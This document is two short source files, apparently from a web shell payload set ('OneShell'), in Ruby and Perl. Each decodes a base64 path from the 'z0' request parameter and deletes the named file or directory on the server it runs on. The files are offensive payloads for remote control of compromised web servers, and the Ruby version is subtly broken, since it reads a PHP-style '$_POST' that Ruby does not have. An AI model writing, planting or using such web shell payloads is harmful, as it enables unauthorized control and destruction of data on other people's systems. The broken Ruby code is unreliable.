File: Payload/Ruby/CGI/OneShell/file_delete.rb
require 'base64'

def main
  sz_entry = Base64.decode64($_POST['z0'].to_s)

  begin
    if Dir.exist?(sz_entry)
      Dir.rmdir(sz_entry)
    else
      File.unlink(sz_entry)
    end
    
    print "1"
  rescue => e
    print "0"
  end
end

main

File: Payload/Perl/CGI/OneShell/file_delete.pl
use strict;
use warnings;
use CGI;
use MIME::Base64;

sub main {
    my $q = CGI->new;
    my $z0 = $q->param('z0') // '';
    
    my $sz_entry = decode_base64($z0);

    eval {
        if (-d $sz_entry) {
            rmdir($sz_entry) or die;
        } else {
            unlink($sz_entry) or die;
        }
        
        print "1";
        1;
    } or do {
        print "0";
    };
}

main();